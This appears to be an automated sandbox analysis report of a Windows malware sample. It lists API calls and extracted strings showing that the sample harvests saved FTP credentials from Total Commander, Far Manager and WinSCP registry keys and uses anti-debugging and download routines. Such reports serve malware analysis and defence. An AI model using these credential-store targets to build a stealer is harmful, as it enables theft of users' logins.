                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrivateProfileString$AllocHeap
                                                                                                                                                                                                                • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                                                                                                                                                                                                                • API String ID: 2479592106-2015850556
                                                                                                                                                                                                                • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                                • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                                                                                                                                                                                                                  • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 004032E5
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 004032ED
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(76990B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(76990B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                                                                                                                                                                                                                • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                                                                                                                                                                                                                • API String ID: 3066332896-2664446222
                                                                                                                                                                                                                • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                                • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00408342
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                                                                                                                                                                                                                • String ID: .$.$.8@$.8@$@@
                                                                                                                                                                                                                • API String ID: 2348139788-3828113974
                                                                                                                                                                                                                • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                                • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                                                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrivateProfile$String$AllocHeap$CombinePath
                                                                                                                                                                                                                • String ID: ftp://%s:%s@%s:%u$pass$port$user
                                                                                                                                                                                                                • API String ID: 3432043379-2696999094
                                                                                                                                                                                                                • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                                • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                                • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                                                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 00402F4E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00403237
                                                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 00403258
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                                                                                                                                                                                                                • String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
                                                                                                                                                                                                                • API String ID: 2247176544-2288798624
                                                                                                                                                                                                                • Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                                                                                                                                                                                                                • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                                                                                                                                                                                                                • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                                                                                                                                                                                                                • String ID: \netprotdrvss.exe$begun.ru
                                                                                                                                                                                                                • API String ID: 2887986221-2660752650
                                                                                                                                                                                                                • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                                                                                                                                                                                                                • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                                                                                                                                                                                                                  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                                  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                                                                                                                                                                                                                • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                                                                                                                                                                                                                • API String ID: 2046068145-3914982127
                                                                                                                                                                                                                • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004027F5
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$InitializeOpenOption
                                                                                                                                                                                                                • String ID: From: true
                                                                                                                                                                                                                • API String ID: 1176259655-9585188
                                                                                                                                                                                                                • Opcode ID: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
                                                                                                                                                                                                                • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040442A
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapOpen$AllocCloseEnumFree
                                                                                                                                                                                                                • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                                                                                                                                                                                                                • API String ID: 416369273-4007225339
                                                                                                                                                                                                                • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040476D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocCloseEnumHeapOpen
                                                                                                                                                                                                                • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                                                                                                                                                                                                                • API String ID: 3497950970-285550827
                                                                                                                                                                                                                • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409359
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409362
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004093B8
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$Free$Alloc$CharLower
                                                                                                                                                                                                                • String ID: http:$javascript$+@
                                                                                                                                                                                                                • API String ID: 1987340527-3375436608
                                                                                                                                                                                                                • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                                • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                                                                                                                                                                                                                • API String ID: 3472027048-1081452883
                                                                                                                                                                                                                • Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                                                                                                                                                                                                                • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,76230F00), ref: 00407043
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00407079
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004070BB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
